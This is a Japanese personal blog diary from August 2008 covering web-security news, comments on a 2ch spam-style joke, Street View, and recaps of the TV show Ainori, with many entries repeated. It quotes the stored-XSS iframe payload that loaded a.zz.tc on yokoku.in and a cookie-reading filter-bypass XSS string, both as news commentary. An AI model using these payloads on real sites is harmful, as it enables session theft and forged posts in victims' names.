2008/08/01(金)金曜日ー。(あ゛〜!! もう!! テンション下がるわぁ...)
[雑談] * 何それ?「駅ですかしっ屁ばらまきます」で警察に通報 (Web屋のネタ帳)
これを yokoku.in に垂れ込んだ「情報提供者」はネタのつもりだったんですかね〜?(-_-;関連: * 犯行予告を共有するサイト「予告.in」はもう限界に達している (GIGAZINE)
[雑談] * 導入負担を軽減:純国産ファイアウォール、JP-Secureが新製品 (まっちゃさん)
まっちゃさんの 「SiteGuardって名前かぶりまくりw」 が、もしも 「F-Secure サイトガード」 のことを指しているのだとしたら、これ、同じ製品のようです。 (ほかの「〜〜ガード」と似てるという話だったらゴメン。)関連: * F-Secureサイトガード 製品譲渡、業務移管に関するご案内 (F-Secure)
[雑談] * 防弾性能のある100万円のポロシャツ (GIGAZINE)
貫通せずに命は守れるのだとしても、この薄さじゃあ、相当なアザができそうだ。(^-^;
これを yokoku.in に垂れ込んだ「情報提供者」はネタのつもりだったんですかね〜?(-_-;関連: * 犯行予告を共有するサイト「予告.in」はもう限界に達している (GIGAZINE)
[雑談] * 導入負担を軽減:純国産ファイアウォール、JP-Secureが新製品 (まっちゃさん)
まっちゃさんの 「SiteGuardって名前かぶりまくりw」 が、もしも 「F-Secure サイトガード」 のことを指しているのだとしたら、これ、同じ製品のようです。 (ほかの「〜〜ガード」と似てるという話だったらゴメン。)関連: * F-Secureサイトガード 製品譲渡、業務移管に関するご案内 (F-Secure)
[雑談] * 防弾性能のある100万円のポロシャツ (GIGAZINE)
貫通せずに命は守れるのだとしても、この薄さじゃあ、相当なアザができそうだ。(^-^;
2008/08/02(土)土曜日ー。(雲>基準線>転換線>今の私のテンション)
[雑談] 立ち入り禁止の向こう側航空自衛隊の最前線 vs 謎の秘密司令室。 いや、ふつう航空自衛隊を選ぶでしょw[雑談] OJT担当-その後うちのリーダーと、隣の部のエバンジェリストに、「だってヤマガタさん、うちらと話すときもメッセ使うじゃないですか。女の子なんて任せられるわけ無いでしょ」「だからヤマガタさんはダメなんっすよー」と口々にダメ出しされた。orz こ、これってパワハラですか?(←ちがうw)[セキュリティ] いろいろ。
[雑談] いろいろ。
- 悪用コード公開の影響: DNSの脆弱性問題でISPに被害 (ITmedia)
- 「悪質サイト」の75%は、不正アクセスされた「正規サイト」 (ITPro)
- フィッシング詐欺ツールが“洗練”、盗んだ情報を“効率的”に管理 (ITPro)
- あの破滅型ハッカーが描いてた、さらにヤバい計画の中身 (gizmodo)
[雑談] いろいろ。
- 妹の質問に答える非常に斬新なPHP用のCAPTCHAモジュール「妹認証」 (GIGAZINE)
- 女ってなんで思わせぶりな態度とるの? (VIPPERな俺)
- 大学キャンパス当て (ベア速)
- あなたに自分の好きなことをする自由な時間を取り戻す20の方法 (GIGAZINE)
2008/08/03(日)日曜日ー。(「33分探偵」、なかなか笑えたw)
[出来事] * 予告.inがクロスサイトスクリプティング攻撃を受けたっぽい (あぷ速)
予告.in に Stored XSS の脆弱性。 下記のように IFRAME を仕込まれてしまったらしい。
東京ビッグサイトでエスカレータが故障。 ゴゴゴゴ!と轟音を発して逆流、けが人が発生。[出来事] * TwitterにCSRF脆弱性:フォロワーを増やせるバグの存在が明らかに (ZDNet)
ぼくjohng77536ちゃん! こんにちはこんにちは!!関連: * Coming up: Auto-follow-me vulnerabilty (TwitPwn)
[雑談] * メイドさん、巫女さんらが集まった「うち水っ娘大集合!2008」 (GIGAZINE)
巫女さんはコスプレじゃなくて本物らしいですw ...さすがに気温43.9度は無いでしょ?![雑談] いろいろ。
予告.in に Stored XSS の脆弱性。 下記のように IFRAME を仕込まれてしまったらしい。
textile<a href=/detail?num=3882>■</a>test <a href=><iframe/src='//a.zz.tc/8/'><font size=1 color=#777777></a></font></a></div>これにより、yokoku.in を見に行った瞬間に、勝手に 2ch に、警視庁を爆破するという犯行予告が、IPアドレス付き(fusianasan)で書き込まれるような仕掛けになっていたらしい。(-_-;**[追記] ・*** 予告inに、犯行予告を通報すると「警視庁を爆破する」という犯行予告してしまうスクリプトが埋め込まれる (デジタルマガジン)
textileクロスサイトスクリプティング攻撃とは、…簡単に説明すると、サイト「A」にコメントを投稿すると、自動的にサイト「B」にもコメントが投稿されてしまうことを言う。↑ この部分は、何だかちょっと “おしい” 感じの要約。(^-^;**[追記] ・*** 予告inにおけるXSS脆弱性、及び被害の概要について (yokoku.in)
textile原因: 犯行予告通報フォームのURL部分のエスケープ処理(不正な文字列を無効化する処理)を行っていませんでした。↑ また、今回の経緯を警視庁、ハイテク犯罪センターに連絡済みとのこと。[雑談] * ワンダーフェスティバル2008、4階から1階へエスカレータが逆流 (GIGAZINE)
東京ビッグサイトでエスカレータが故障。 ゴゴゴゴ!と轟音を発して逆流、けが人が発生。[出来事] * TwitterにCSRF脆弱性:フォロワーを増やせるバグの存在が明らかに (ZDNet)
ぼくjohng77536ちゃん! こんにちはこんにちは!!関連: * Coming up: Auto-follow-me vulnerabilty (TwitPwn)
[雑談] * メイドさん、巫女さんらが集まった「うち水っ娘大集合!2008」 (GIGAZINE)
巫女さんはコスプレじゃなくて本物らしいですw ...さすがに気温43.9度は無いでしょ?![雑談] いろいろ。
- 理系のための恋愛論 (290) 「どこの店がいい?」「どこでもいいよ」…どうする?
- 庭で美しい「水の彫刻」を鑑賞するという贅沢 (gizmodo)
- 携帯電話対応高感度パラボラアンテナ単体 (携帯ストラップ専門店)
2008/08/04(月)月曜日ー。(あーぁ、つまんねぇーな!!)
[雑談] いろいろ。
←コピーに飽き足らず...
←女性の特徴を構造体で表現w
←“冷たい視線を浴びせられ”
←バラエティによくある「英語禁止ボーリング」みたいに?w
←気象兵器?w
←犯罪予告はダメw
←XSS
←卒業後に注目。[TV][あいのり] #413 LOVE LOVE LOVEベナンからマリ共和国へ。 矢印: こーすけ、海、シュレック、桃、よっこ。聖二の告白を断ったよっこと、クロの告白を断ったこーすけが元気がない。よっこの日記“最近何でここにいるんだろう…と思う日も多々あり 体が正直に反応して部屋を出る頃になると吐き気がしたり お腹が痛くなって男の子と会いたくない…と思ってしまう”こーすけ「俺の一言でクロの人生 変わっちゃったんだなぁと思って いろいろ考えてて それで何回も逃げ出そうと思って」桃「クロの告白を断った時点で終わりなんだよ 一区切りついたの それは だからもう本当はクロのことなんて忘れなきゃいけない でしょ?」こーすけの日記“桃には心の中ですごく支えてもらって 元気も一杯にしてくれて助けられた” 新メンバー: * ヤマジ
(22歳) B型、愛知県出身、フリーター、天然箱入り娘。海の眉毛が濃いことが気になっていた桃、呼び出して眉毛カットに挑戦。海「近いねー」 桃「顔の距離?」 海「うん 心拍数が」 桃「うふふ 絶対変わってないでしょ」 海「俺第一印象誰だって言ったと思う?」 桃「誰?えーそんな話振るから ちょっと期待しちゃうんだけど」 海「当ててみて」 桃「なんて言ってくれたの?くれたの?とか言ってもう桃だと思ってるんだけど」 海「うん なんか 眉毛 今カットしてくれてる子って言ってたみたい 誘うことも多くなるかもね」 桃「ホントに?」桃がこーすけに恋??! (今までクロに遠慮していたが、実は第一印象から...?!)スタッフ「こーすけとは最近どう?ワゴンで話してる声がいつもの声と違ったもん」
桃の日記“こーすけと話がしたい”桃「少し手の届かない存在って感じなところが 良いのかも」ところが、こーすけは・・・桃の励ましで元気を取り戻して・・・よっこを誘った。こーすけの日記“すべてプラスの考えにかわった 本物の恋を見つけたい”こーすけ「(よっこは)絶対なんか(リタイア)考えてるもん」 よっこ「考えてないよ」 こーすけ「帰さないよ!その考えを変えさせたい」 よっこ「なんか こーすけ 大人になってきたね」 もしや、海->桃->こーすけ<=>よっこみたいなことになってる?!次週は、複雑に絡み合う4人の恋?! そして、ヤマジが何かやらかすらしい。(^-^;⇒* 今週のあいのり
、 * あいのりウラ話(ヤマジの日記)
- 国土安全保障省、ノートパソコンの押収を無期限に可能に (CNET)
←コピーに飽き足らず...
- 女性の特徴をC言語で表現 (Geekなページ)
←女性の特徴を構造体で表現w
- 安田に衝撃! えっ、中国に天津飯ない!? (スポーツ報知)
←“冷たい視線を浴びせられ”
- 英単語は一切使うな (ITPro)
←バラエティによくある「英語禁止ボーリング」みたいに?w
- 関西圏に超巨大な謎のエンジェルリングが降臨 (GIGAZINE)
←気象兵器?w
- みんなのいろいろな予告を音声で聞ける「予告.on」 (GIGAZINE)
←犯罪予告はダメw
- 「予告.in」に不正コード埋め込み 閲覧すると2chに犯行予告投稿 (ITmedia)
←XSS
- ソノマ州立大学教授 ハッカー技術養成講座 (ウィルス対策ニュース)
←卒業後に注目。[TV][あいのり] #413 LOVE LOVE LOVEベナンからマリ共和国へ。 矢印: こーすけ、海、シュレック、桃、よっこ。聖二の告白を断ったよっこと、クロの告白を断ったこーすけが元気がない。よっこの日記“最近何でここにいるんだろう…と思う日も多々あり 体が正直に反応して部屋を出る頃になると吐き気がしたり お腹が痛くなって男の子と会いたくない…と思ってしまう”こーすけ「俺の一言でクロの人生 変わっちゃったんだなぁと思って いろいろ考えてて それで何回も逃げ出そうと思って」桃「クロの告白を断った時点で終わりなんだよ 一区切りついたの それは だからもう本当はクロのことなんて忘れなきゃいけない でしょ?」こーすけの日記“桃には心の中ですごく支えてもらって 元気も一杯にしてくれて助けられた” 新メンバー: * ヤマジ
(22歳) B型、愛知県出身、フリーター、天然箱入り娘。海の眉毛が濃いことが気になっていた桃、呼び出して眉毛カットに挑戦。海「近いねー」 桃「顔の距離?」 海「うん 心拍数が」 桃「うふふ 絶対変わってないでしょ」 海「俺第一印象誰だって言ったと思う?」 桃「誰?えーそんな話振るから ちょっと期待しちゃうんだけど」 海「当ててみて」 桃「なんて言ってくれたの?くれたの?とか言ってもう桃だと思ってるんだけど」 海「うん なんか 眉毛 今カットしてくれてる子って言ってたみたい 誘うことも多くなるかもね」 桃「ホントに?」桃がこーすけに恋??! (今までクロに遠慮していたが、実は第一印象から...?!)スタッフ「こーすけとは最近どう?ワゴンで話してる声がいつもの声と違ったもん」
桃の日記“こーすけと話がしたい”桃「少し手の届かない存在って感じなところが 良いのかも」ところが、こーすけは・・・桃の励ましで元気を取り戻して・・・よっこを誘った。こーすけの日記“すべてプラスの考えにかわった 本物の恋を見つけたい”こーすけ「(よっこは)絶対なんか(リタイア)考えてるもん」 よっこ「考えてないよ」 こーすけ「帰さないよ!その考えを変えさせたい」 よっこ「なんか こーすけ 大人になってきたね」 もしや、海->桃->こーすけ<=>よっこみたいなことになってる?!次週は、複雑に絡み合う4人の恋?! そして、ヤマジが何かやらかすらしい。(^-^;⇒* 今週のあいのり
、 * あいのりウラ話(ヤマジの日記)
2008/08/05(火)火曜日ー。(日焼け止め塗ったからって暑さが軽減されるわけではない。)
[セキュリティ] * セキュリティ脅威の発信源を「Googleマップ」に表示 (INTERNET Watch)
経由。 プロットされている点が少ないなーと思ったら、直近、500件分の脅威を 30分ごとに自動更新とかいう仕組みなのね。 なるほど。 >* 脅威は世界中からやってくる
[雑談] * グーグル、日本でもストリートビュー提供開始 (@IT)
自宅もバッチリ写ってましたw 「はてな」の近藤さんは、なんと* 知り合いを見つけた
らしいw関連(?!): * Google Mapsの新機能ストリートビューでETが発見された!?
[出来事] * 北京五輪チケット販売の偽サイトが出現、既に被害者続出か (ITmedia)
「Olympic tickets」で検索すると、偽サイトのほうが上位に表示されてたそうですw[雑談] いろいろ。
←luminさん&葉っぱさん!
←ネコ。
←無いなw
[雑談] * 『東京ドームを霞ヶ関ビルで』とグーグルで検索すると・・ (Google Mania)
面積「* 東京ドームを霞ヶ関ビルで
」や、容積「* 10000リットルを東京ドームで
」の計算が可能。
- まっちゃさん
経由。 プロットされている点が少ないなーと思ったら、直近、500件分の脅威を 30分ごとに自動更新とかいう仕組みなのね。 なるほど。 >* 脅威は世界中からやってくる
[雑談] * グーグル、日本でもストリートビュー提供開始 (@IT)
自宅もバッチリ写ってましたw 「はてな」の近藤さんは、なんと* 知り合いを見つけた
らしいw関連(?!): * Google Mapsの新機能ストリートビューでETが発見された!?
[出来事] * 北京五輪チケット販売の偽サイトが出現、既に被害者続出か (ITmedia)
「Olympic tickets」で検索すると、偽サイトのほうが上位に表示されてたそうですw[雑談] いろいろ。
- 今だからこそ、生産性を上げるインターネット活用
←luminさん&葉っぱさん!
- たのしいピアノきょうしつ (アルファルファモザイク)
←ネコ。
- 五輪の年を刻んでいた古代のスーパーコンピューター (AFPBBニュース)
- OLに聞いた「男性が着けていてグッとくる腕時計」
←無いなw
- 万引き捕まえたらモンペに訴えられかけた (ハムスター速報)
- 逮捕されると、こうなる 〜誰かさんの経験〜
- 「図書館は利用者の秘密を守る」問題・・・このパターンって想定されているのか?
- ワインの偽物を見破る「電子の舌」登場 (ITmedia)
- ネット上で「開会式の10大予想」が大ブーム―中国 (Excite)
- がんばれ!アドミンくん 第135話 Web x.0 (@IT)
[雑談] * 『東京ドームを霞ヶ関ビルで』とグーグルで検索すると・・ (Google Mania)
面積「* 東京ドームを霞ヶ関ビルで
」や、容積「* 10000リットルを東京ドームで
」の計算が可能。
2008/08/06(水)水曜日ー。(こ、これはいぢめですか?w >)
[セキュリティ] * [バグ 仕様] 2chの脆弱性について語る [2ちゃんねる]
2007年03月時点ですが、リファラが正しくない場合のエラーメッセージ内でのXSSの問題や、リファラチェックが不完全(先頭に http://*.2ch.net があればOK)といった問題があったようですね。関連: * 予告.inがXSSでやられた (水無月ばけらのえび日記)
[雑談] * Googleのストリートビュー対策 (他人の脳内)
“robots.txtに相当する物体を家の軒先に設置する”などの対策案w 笑えたw 「User-Agent: GoogleStreetView」「Disallow: /myHouse/」的な看板を作ったら売れるかな?w[出来事] * 通販サイト大手のナチュラム,65万件以上の個人情報を漏えい (ITPro)
またクレジットカード会社からの連絡で発覚したパターンなのね。 公開までに1ヶ月も経っているのは、* 例によって
クレジットカード会社に公開を止められていたパターンなのかな。(^-^;関連: * 「アウトドア&フィッシング ナチュラム」への不正アクセス発生につきまして
[雑談] * 安眠促進CD『羊でおやすみシリーズ』
がすごいらしいw 羊を数えながら、「うっとおしいわ! なぜ寝ない!」 「目を開けるな! 閉じろゴルァァ!」とか言うらしいw 安眠させる気ないでしょ?w[出来事] * メールマガジン誤送信について (Biwaコレ!!)
経由。 “biwaコレ!!メールマガジン「びわっちゅうちわ」”って確かにすごい名前だw 一部の会員のメールアドレスが To: か Cc: に入っている状態で送信したということらしいですが、メルマガってふつう何らかのシステムで配信するんじゃないのかなぁw メーラー使うとかアリエナイ。[雑談] * 火星からとらわれの地球人が送信した謎のメール (GIGAZINE)
こ、これは本当にだまそうとしているというよりも、“* イグノーベル賞
”ねらい<%=fn'ナイジェリア詐欺のグループには、「多彩なキャラクターの登場する波乱万丈の短編集を全世界の読者に配信した」功績で、2005年にイグノーベル賞文学賞が授与されたそうですw'%>にちがいないw関連: * Martian Scam (English Russia)
[出来事] * 4000万件のカード情報を窃盗:米国で過去最大のハッキング事件を摘発
4000万件ってスゴイ。 11人が大手小売 9社のネットワークに侵入して、カード情報を盗み出し、インターネット経由で売りさばいたり、ATM から現金を引き出したりしたとして摘発されたそうです。[雑談] いろいろ。
[雑談] * 夫「鍵がないよー」 妻「あなたー、鍵受け取って!」 向かいのホームに投げた鍵が引っかかり電車停止…約8600人に影響 (痛いニュース)
ほのぼのストーリーw 確かに、これが東京だったら大変なことになってましたね。(^-^;
2007年03月時点ですが、リファラが正しくない場合のエラーメッセージ内でのXSSの問題や、リファラチェックが不完全(先頭に http://*.2ch.net があればOK)といった問題があったようですね。関連: * 予告.inがXSSでやられた (水無月ばけらのえび日記)
[雑談] * Googleのストリートビュー対策 (他人の脳内)
“robots.txtに相当する物体を家の軒先に設置する”などの対策案w 笑えたw 「User-Agent: GoogleStreetView」「Disallow: /myHouse/」的な看板を作ったら売れるかな?w[出来事] * 通販サイト大手のナチュラム,65万件以上の個人情報を漏えい (ITPro)
またクレジットカード会社からの連絡で発覚したパターンなのね。 公開までに1ヶ月も経っているのは、* 例によって
クレジットカード会社に公開を止められていたパターンなのかな。(^-^;関連: * 「アウトドア&フィッシング ナチュラム」への不正アクセス発生につきまして
[雑談] * 安眠促進CD『羊でおやすみシリーズ』
- 番外編「俺は眠くなーい」
がすごいらしいw 羊を数えながら、「うっとおしいわ! なぜ寝ない!」 「目を開けるな! 閉じろゴルァァ!」とか言うらしいw 安眠させる気ないでしょ?w[出来事] * メールマガジン誤送信について (Biwaコレ!!)
- まっちゃさん
経由。 “biwaコレ!!メールマガジン「びわっちゅうちわ」”って確かにすごい名前だw 一部の会員のメールアドレスが To: か Cc: に入っている状態で送信したということらしいですが、メルマガってふつう何らかのシステムで配信するんじゃないのかなぁw メーラー使うとかアリエナイ。[雑談] * 火星からとらわれの地球人が送信した謎のメール (GIGAZINE)
こ、これは本当にだまそうとしているというよりも、“* イグノーベル賞
”ねらい<%=fn'ナイジェリア詐欺のグループには、「多彩なキャラクターの登場する波乱万丈の短編集を全世界の読者に配信した」功績で、2005年にイグノーベル賞文学賞が授与されたそうですw'%>にちがいないw関連: * Martian Scam (English Russia)
[出来事] * 4000万件のカード情報を窃盗:米国で過去最大のハッキング事件を摘発
4000万件ってスゴイ。 11人が大手小売 9社のネットワークに侵入して、カード情報を盗み出し、インターネット経由で売りさばいたり、ATM から現金を引き出したりしたとして摘発されたそうです。[雑談] いろいろ。
- 名俳優並のリアクションをする「ドラマティック・キャット」 (GIGAZINE)
- Twitterにセキュリティ懸念--トロイの木馬へのリンクや、自動追跡の脆弱性 (CNET)
- アップルのDNS脆弱性修正パッチにセキュリティ専門家から非難の声 (CNET)
- 宝石店に押し入った3人組を通りすがりの男性が間接的に無力化した方法とは
- メールの盗み見はれっきとした“犯罪” (computerworld.jp)
- 社会人の残業事情、4人に1人が「ほとんどしない」 (ORICON STYLE)
- 【OL白書vol.2】今欲しいのは、愛と恋どっち? (オリコン)
- 人妻とフラフラ!TBS社長、W不倫疑惑 (サンケイスポーツ)
- 日産が「ぶつからないクルマ」のプロトタイプを開発 (GIGAZINE)
- アナログ停波までに片付けねばならない5つの課題 (ITmedia)
- ハルヒをパクった絵が大賞受賞してる件 (日刊スレッドガイド)
[雑談] * 夫「鍵がないよー」 妻「あなたー、鍵受け取って!」 向かいのホームに投げた鍵が引っかかり電車停止…約8600人に影響 (痛いニュース)
ほのぼのストーリーw 確かに、これが東京だったら大変なことになってましたね。(^-^;
2008/08/07(木)木曜日ー。(charset追加機能がついた☆)
[セキュリティ] * 緊急対応から見たセキュリティの現状、報告書公開 (ITmedia)
経由。 いくつか実際のリクエストの抜粋や応急対応の方法が出てるみたい。関連: * 緊急対応から見たWebサイト用データベースセキュリティ対策
**[pdf]**[雑談] * 若い子のための「?」の使い方 (遥か彼方の彼方から)
ちょw 会話文でこれを使いこなす “若い子” なんて正直居てほしくないぞw[セキュリティ] * とある改竄報告ページにあった脆弱性の話 (水無月ばけらのえび日記)
HTMLタグっぽいものを単純に一度削除しているだけだったため、「"><scr<s>ipt>alert(document.cookie)</sc<s>ript>」のような入力でスクリプト実行に至ったらしい。 ダメな修正方法の見本みたいですねw ちなみに、“* XSS Challenges
” の Stage #10 に同じような問題が出てきますw[雑談] いろいろ。
[雑談] 今日のspam:「yahoo!!ユーザに逆援ソーシャル招待状が届いています。」このメール自体が、ソーシャル(エンジニアリング)だ、というオチでしょうか?w[雑談] * 福岡のデザイナとプログラマがコミュニティで仲が良い理由を考えてみた
分業化が進んでいるか否かの違いでは?との考察。 結論:コミュニティで愛を育もうよ!(^-^)
- まっちゃさん
経由。 いくつか実際のリクエストの抜粋や応急対応の方法が出てるみたい。関連: * 緊急対応から見たWebサイト用データベースセキュリティ対策
**[pdf]**[雑談] * 若い子のための「?」の使い方 (遥か彼方の彼方から)
ちょw 会話文でこれを使いこなす “若い子” なんて正直居てほしくないぞw[セキュリティ] * とある改竄報告ページにあった脆弱性の話 (水無月ばけらのえび日記)
HTMLタグっぽいものを単純に一度削除しているだけだったため、「"><scr<s>ipt>alert(document.cookie)</sc<s>ript>」のような入力でスクリプト実行に至ったらしい。 ダメな修正方法の見本みたいですねw ちなみに、“* XSS Challenges
” の Stage #10 に同じような問題が出てきますw[雑談] いろいろ。
- Google マップ ストリートビューのまとめ: ロケ中の戸田恵梨香ちゃん?
- Google マップ ストリートビューのまとめ: スクープ画像もお手の物
- Google マップ ストリートビューのまとめ: 女子にぶん殴られる男子
- Google マップ ストリートビューのまとめ: おっおい道端で! 外でいちゃつくJK
- Google マップ ストリートビューのまとめ: ラブホに入ろうとする若者
- 慶大、駒大名乗る犯罪自慢 ミクシィ「告白」に大学大困惑 (J-CASTニュース)
[雑談] 今日のspam:「yahoo!!ユーザに逆援ソーシャル招待状が届いています。」このメール自体が、ソーシャル(エンジニアリング)だ、というオチでしょうか?w[雑談] * 福岡のデザイナとプログラマがコミュニティで仲が良い理由を考えてみた
分業化が進んでいるか否かの違いでは?との考察。 結論:コミュニティで愛を育もうよ!(^-^)
2008/08/08(金)金曜日ー。(男は黙って・・・会釈!(←クールポコっぽくw))
[セキュリティ] * オレオレSQLの作り方〜MySQL編〜 (よねのはてな)
興味深い。 データに「"」「,」「:」とか入ってたら どうなるかな〜とか考えるとわくわくしますw[雑談] * 当店のホームページはNEC/biglobeおよび 株式会社シマンテック提供メールウィルスチェックにより安心してご覧いただけます。 (skubotaの日記)
(* まっちゃさん
経由。)ホームページにアクセスするとコンテンツをメールで送ってくれる仕組みですね、わかりますwちなみに、「メールウイルスチェックプラス」というサービス名称で、「* ホームページウイルスチェック
」「* メールウィルスチェック
」「* メール盗聴防止
」の3点セットを提供しているようですが、これはあくまでもクライアント側のサービスですよねぇ。 BIGLOBE を通じてアクセスしてくださいという意味でしょうか?w[セキュリティ] * 標的型メール攻撃に“予防接種”は有効か? (INTERNET Watch)
経由。 JPCERT/CC が、自分自身を含む 5つの組織 116人に “擬似ウィルスメール” を送信して開封率を調べた結果が公開されています。 実行ファイルならともかく、Word や Excel などの文書ファイルだったら、パッチを当てているマシンなら、(ゼロデイが出ている!とか騒ぎになっていない限り、)結構、無防備に開いてしまいそうな予感もしますけども。(^-^;関連: * 標的型攻撃対策手法に関する調査報告書 (JPCERT/CC)
**[pdf]**[動物] * チワワと仲良しだった猫ちゃんの悲劇 (おもしろ動物園)
犬好きなひとも、猫好きなひとも必見かも?w 仲直りしてくれると良いですね。(^-^)[セキュリティ] * DNS脆弱性問題、発見者が欠陥の詳細をついに公表 (computerworld)
例の講演は、特に大きな隠し玉なく終了したということかな。 「SSLはわれわれが思っているような万能薬ではない」というのは、証明書発行時にメールやWebを通じてやりとりしているからという話であって、それ以上のものではないという理解で良いかな。(@_@)関連: * カミンスキー氏、DNS脆弱性について詳細を公開 (CNET)
[雑談] いろいろ。
(* まっちゃさん
経由。)
興味深い。 データに「"」「,」「:」とか入ってたら どうなるかな〜とか考えるとわくわくしますw[雑談] * 当店のホームページはNEC/biglobeおよび 株式会社シマンテック提供メールウィルスチェックにより安心してご覧いただけます。 (skubotaの日記)
(* まっちゃさん
経由。)ホームページにアクセスするとコンテンツをメールで送ってくれる仕組みですね、わかりますwちなみに、「メールウイルスチェックプラス」というサービス名称で、「* ホームページウイルスチェック
」「* メールウィルスチェック
」「* メール盗聴防止
」の3点セットを提供しているようですが、これはあくまでもクライアント側のサービスですよねぇ。 BIGLOBE を通じてアクセスしてくださいという意味でしょうか?w[セキュリティ] * 標的型メール攻撃に“予防接種”は有効か? (INTERNET Watch)
- まっちゃさん
経由。 JPCERT/CC が、自分自身を含む 5つの組織 116人に “擬似ウィルスメール” を送信して開封率を調べた結果が公開されています。 実行ファイルならともかく、Word や Excel などの文書ファイルだったら、パッチを当てているマシンなら、(ゼロデイが出ている!とか騒ぎになっていない限り、)結構、無防備に開いてしまいそうな予感もしますけども。(^-^;関連: * 標的型攻撃対策手法に関する調査報告書 (JPCERT/CC)
**[pdf]**[動物] * チワワと仲良しだった猫ちゃんの悲劇 (おもしろ動物園)
犬好きなひとも、猫好きなひとも必見かも?w 仲直りしてくれると良いですね。(^-^)[セキュリティ] * DNS脆弱性問題、発見者が欠陥の詳細をついに公表 (computerworld)
例の講演は、特に大きな隠し玉なく終了したということかな。 「SSLはわれわれが思っているような万能薬ではない」というのは、証明書発行時にメールやWebを通じてやりとりしているからという話であって、それ以上のものではないという理解で良いかな。(@_@)関連: * カミンスキー氏、DNS脆弱性について詳細を公開 (CNET)
[雑談] いろいろ。
- 弊社取締役の、なんともコメントしづらい画像流出のお詫びとお知らせ (未来検索ブラジル)
- CNET Networks site compromise (Security Labs Alert)
(* まっちゃさん
経由。)
- 好きになってもらうために苦手だけど努力したことランキング (gooランキング)
- 夏目漱石や芥川龍之介の文学に夏帆や岡本杏理が! (シネマトゥデイ)
2008/08/09(土)土曜日ー。(ママでもメダル。)
[セキュリティ] * PC修理時にWebcamの盗撮用アプリケーションを仕込み逮捕 (/.jp)
フロリダ大学の男子学生が、8〜9人ほどの女子学生をPC経由で盗撮。 修理の際にリモートアクセスツール(Log Me In) と、自作の Web Cam Spy Hacker を仕込んだそうです。 この自作ツールは、写真を撮影してリモートサーバにアップロードするものだったらしい。 約20,000枚の写真を盗撮。[雑談] * 中国で発明された、駅で停車する必要のない画期的な電車 (IDEA*IDEA)
乗降客が多い駅はちゃんと停車するとして、途中の通過駅はこれで乗降とかありかもw[出来事] * NEC公式サイトにアクセスするとブラウザが操作不能に (GIGAZINE)
NEC の公式サイトのトップページにアクセスすると、置いてある Flash が、存在しない XMLファイルを参照していることが原因で、IE / Firefox / Opera / Safari が異常終了する事態だったらしい。
関連: * NECのホームページがブラクラとしてリニューアル (ニュース超速報!)
[雑談] いろいろ。
フロリダ大学の男子学生が、8〜9人ほどの女子学生をPC経由で盗撮。 修理の際にリモートアクセスツール(Log Me In) と、自作の Web Cam Spy Hacker を仕込んだそうです。 この自作ツールは、写真を撮影してリモートサーバにアップロードするものだったらしい。 約20,000枚の写真を盗撮。[雑談] * 中国で発明された、駅で停車する必要のない画期的な電車 (IDEA*IDEA)
乗降客が多い駅はちゃんと停車するとして、途中の通過駅はこれで乗降とかありかもw[出来事] * NEC公式サイトにアクセスするとブラウザが操作不能に (GIGAZINE)
NEC の公式サイトのトップページにアクセスすると、置いてある Flash が、存在しない XMLファイルを参照していることが原因で、IE / Firefox / Opera / Safari が異常終了する事態だったらしい。
関連: * NECのホームページがブラクラとしてリニューアル (ニュース超速報!)
[雑談] いろいろ。
- まるで線香花火!稲妻が落ちる瞬間を超スピードカメラで撮影 (らばQ)
- 東京の陸上自衛隊広報センターに遊びに行ってきました (GIGAZINE)
- 赤ん坊のときに同じ病室にいた二人が20年後に巡り会い、一目で恋に落ちる
- 【ビアガーデン】汐留ガーデンに行ってきた (サイコトルチョック)
- 世界初、Webで鉄道模型シミュレーション (ITmedia)
2008/08/10(日)日曜日ー。(「金メダル以外は、おなじです。」)
[雑談] いろいろ。
- 「ストリートビュー」のプライバシー問題、グーグルが方針説明 (IMPRESS)
- 日本のストリートビューが気持ち悪いと思うワケ (higuchi.com)
- 「1日のほとんどがマナーモード」、若い世代ほど高い傾向に (ITmedia)
- 高校生、なりたい職業ランキング…1位・タレント、2位・ヴォーカリスト、3位・ミュージシャン、4位・SE (痛いニュース)
- 女の子に好かれるための基本原則 (分裂勘違い君劇場)
- フライドチキンは空をとぶ: 童貞卒業し損ねたんだけど・・・
- 仕事中はうつ 会社の外では元気 「新型うつ病」大流行の裏側 (J-CAST)
- 自衛隊限定の栄養ドリンク試飲レビュー (GIGAZINE)
- PS3上でWindows Vistaを起動、所要時間は約25分 (/.jp)
- 携帯で撮影してコンビニでプリントできる「ケータイ証明写真」(IMPRESS)
- セクハラよりは死を?しつこいオスから命がけで逃げるメスのグッピー (AFPBB)
- 女の子との会話・メール・電話の内容を報告するスレ (アルファモザイク)
- 女の子に好かれるためのたった一つの基本原則 (はてな匿名ダイアリー)
- これ以上簡単なお菓子はない。しかもウマイ。 (ニュー速クオリティ)
- 56Kモデムで成し遂げられた「軍事ネットワーク史上最大のハッキング」 (gizmodo)
2008/08/11(月)月曜日ー。(気まずいことがダメなんだ〜♪)
[セキュリティ] * Webアプリケーション脆弱性対策の常識10題 (ITmedia)
経由。 MBSDさんのセキュリティ診断結果の統計情報と、対策方法のクイズ。関連(?!): * Webサイトのセキュリティ診断:傾向分析レポート2008 (NRIセキュア)
[雑談] いろいろ。
[TV][あいのり] #414 DOMINOマリ縦断中。 矢印: 海->桃->こーすけ<=>よっこ。 シュレック、ヤマジ。こーすけのことが気になる桃。 自分に思いを寄せてくれる海についてスタッフに語る。桃「まぁ嬉しいことは嬉しいんですよ。 (海は)すごい優しいし。 たぶん超尽くしてくれるし。 いいと思うんですけど・・・ 好きにはならないかなぁっていう感じですかね。 ・・・そんなに親密ですか?よっことこーすけ」新メンバーのヤマジが問題行動を連発。 メンバー、ヤマジに苛立つ。ヤマジ「食べ物いらないから 飲み物 コーラ コーラ!コーラ!」ヤマジ「海とこーすけ よくさ積極的に誘ってるじゃんあの2人を。 シュレックはあの2人 誘わないの? 余った私をこの人でいいやって拾ってるように見えるからさ。 私達やたらツーショット多いじゃん。 私 旅参加して 拾われてる・・・あっこいつ余ってるからこいつでいいやみたいな。 だっていっつも1番最後に私の名前を呼ぶじゃん」ヤマジ以外のメンバー全員で話し合い、こーすけからヤマジに「注意」することが決定。こーすけ「ヤマジ同じ年で いろいろ聞いててあり得ないなって思うこといっぱいあるんだ。 自分では何も思わない?シュレックに言ったこととか。 シュレックの甘さに甘えて そういうひどいこと言うのはすげぇ許せねぇんだ。 シュレックに悪かったなって気持ちある? あいのり貧乏旅行で ギリギリのお金でみんなで生活していくのね。 それなのに『あれが飲みたい』とか。 俺そういうの すんごい気に入らないんだ。 1つ1つの発言に悪気がないのかもしれないけど たかが一言だろうがみんな我慢してることだし 